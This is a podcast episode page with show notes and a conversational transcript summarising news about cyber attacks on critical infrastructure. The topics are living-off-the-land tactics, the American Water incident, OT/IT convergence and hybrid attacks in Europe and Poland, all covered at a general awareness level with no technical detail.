.png)
Industry Defence Insights
Our engaging episodes will equip you with essential knowledge about OT/ICS/IT cybersecurity to safeguard your digital presence. Your digital safety starts here!
Industry Defence Insights
Digital Battlegrounds
Critical infrastructure systems face increasingly sophisticated cyber attacks, with hackers using legitimate tools already present in targeted networks to avoid detection and establish persistence.
• "Living off the land" tactics make attacks nearly impossible to detect because hackers utilize legitimate system tools
• The attack on American Water disrupted IT systems like customer billing while highlighting vulnerabilities in essential services
• Convergence of operational technology and information technology creates more entry points for attackers
• European infrastructure experiencing surge in cyber attacks since Russia-Ukraine conflict began
• Poland reported over 400,000 cyber incidents in first half of 2024, double the total for all of 2023
• "Hybrid attacks" combine traditional hacking with disinformation campaigns and communication disruption
• Geopolitical tensions fuel sophisticated attacks targeting critical infrastructure
• Global cooperation required to protect interconnected systems from evolving threats
Stay vigilant and stay safe.
All right, so today we're going to dive into a topic that's kind of unsettling, honestly Cyber attacks, specifically those targeting critical infrastructure.
Speaker 2:Yeah, that's right.
Speaker 1:And you sent over some articles that really highlight what's been going on both in the US and in Europe and I got to say it's some pretty concerning stuff. Definitely. You know we're talking about systems that literally keep our lights on our water running. You know a lot of stuff that we just take for granted. So, ready to sort of unpack all this and see what it all means.
Speaker 2:Yeah, absolutely, let's dive in. It's definitely a very complex landscape and the stakes are very high.
Speaker 1:Okay, so one article highlighted these attacks on US energy infrastructure and they were using this tactic called living off the land, or LOTL. Have you heard of this?
Speaker 2:Oh yeah, LOTL is. It's becoming increasingly common, unfortunately.
Speaker 1:Yeah, so from what I understand, it's basically where hackers use legitimate tools that are already in the system to kind of like hide their activity. It's almost like a digital Trojan horse.
Speaker 2:Yeah.
Speaker 1:And they even mentioned this group, that's. I think they said it was linked to China. Volt Typhoon was the name using this tactic. So I guess the question is like why is this such a big deal? Like why is the fact that they're using legitimate tools such a problem?
Speaker 2:Well, you know, think of it this way With LOTL, hackers are basically using the system's own tools against it. It makes it incredibly difficult to detect malicious activity.
Speaker 1:Right, because it's like it's all supposed to be there.
Speaker 2:Exactly. It's like trying to find a needle in an A-stack, and this can give hackers long-term access to the system to really map things out, potentially steal sensitive data and even set the stage for sabotage down the line.
Speaker 1:Okay. So it's not just like they're getting in, they're staying in.
Speaker 2:Right, they're persistent. They're trying to establish persistence within the network.
Speaker 1:That's really unsettling to think about. It makes you realize just how vulnerable these systems really are, and it's not just energy, right, I mean, there's that cyber attack on American water, one of the biggest water utility companies in the US.
Speaker 2:Yeah.
Speaker 1:That was a big one and, while Right, one of the biggest water utility companies in the US.
Speaker 2:Yeah, that was a big one.
Speaker 1:And you know, while they said that the water quality wasn't affected this time, it still messed with their IT systems like customer billing and stuff like that. Yeah, I mean, it kind of makes you wonder, like what kind of cybersecurity measures are in place for the water system where you live.
Speaker 2:Right, and that's a great point to bring up, because a lot of people don't realize that these critical infrastructure systems, whether it's water, energy, transportation, they're all increasingly interconnected.
Speaker 1:Yeah.
Speaker 2:And that attack on American water is a prime example of that. We're seeing a growing integration of what we call OT, or operational technology, which controls the physical processes, and IT, which is information technology which manages data, and IT, which is information technology which manages data, and this convergence creates more points of entry for attackers and it makes securing these systems much more complex.
Speaker 1:Okay, so more connections means more vulnerabilities, and speaking of connections, things seem even more tense over in Europe, don't they, especially with everything going on between Russia and Ukraine? One of the articles mentioned this huge surge in cyber attacks on critical infrastructure in Europe. Since that whole conflict began, I think they said in 2022 alone, there were like 48 successful attacks on the energy sector.
Speaker 2:Yeah, and Europe's reliance on Russian energy has definitely made it a prime target for cyber warfare.
Speaker 1:Yeah, I can see that.
Speaker 2:The articles you sent. They highlighted Russian hacking groups targeting energy grids, railway systems, hospitals, even.
Speaker 1:Wow.
Speaker 2:It's a stark reminder that cyber attacks are often intertwined with geopolitical goals and tensions.
Speaker 1:And it's not even just straight up hacking either. Right, they were talking about these hybrid attacks. What are those all about?
Speaker 2:So hybrid attacks are basically multifaceted. They might combine traditional hacking techniques with things like disinformation campaigns, electronic jamming, disruption of communications, basically trying to create a very confusing and chaotic environment.
Speaker 1:So it's not just the systems. It's like messing with people's minds too.
Speaker 2:Exactly. The goal is often to sow discord, to erode public trust and to make it difficult to mount an effective response.
Speaker 1:Yeah, like almost like adding psychological warfare on top of everything else.
Speaker 2:Right.
Speaker 1:One article really zeroed in on Poland. It seems like they're right in the thick of things.
Speaker 2:Yeah.
Speaker 1:They said there were something like over 400,000 cyber incidents reported just in the first half of 2024. Wow, that's double the total for all of 2023.
Speaker 2:Yeah, and Poland's location and its strong support for Ukraine definitely make it a prime target. Polish security services have identified sabotage groups linked to Russia and Belarus operating within the country, and their goals seem to be blackmail and the destabilization of Poland, adding yet another layer of complexity to this whole situation.
Speaker 1:So it's like we've got increasingly sophisticated hacking techniques, interconnected systems creating more vulnerabilities and then, on top of all of that, geopolitical tensions that are fueling a rise in these attacks. It's kind of daunting, honestly.
Speaker 2:It is, and it really begs the question as technology continues to evolve, as our reliance on these interconnected systems continues to grow, as our reliance on these interconnected systems continues to grow, how do we ensure the resilience of critical infrastructure against these increasingly sophisticated threats? It's a huge challenge and it requires a global effort, not just from governments and security experts, but from everyone. We all have a role to play in this.
Speaker 1:Yeah, well, on that note, I think that's a good place to wrap up for today.
Speaker 2:Sounds good.
Speaker 1:So thanks for breaking all that down.
Speaker 2:You're welcome.
Speaker 1:And to all of you listening out there stay vigilant and stay safe.
Speaker 2:Absolutely Till next time, see you.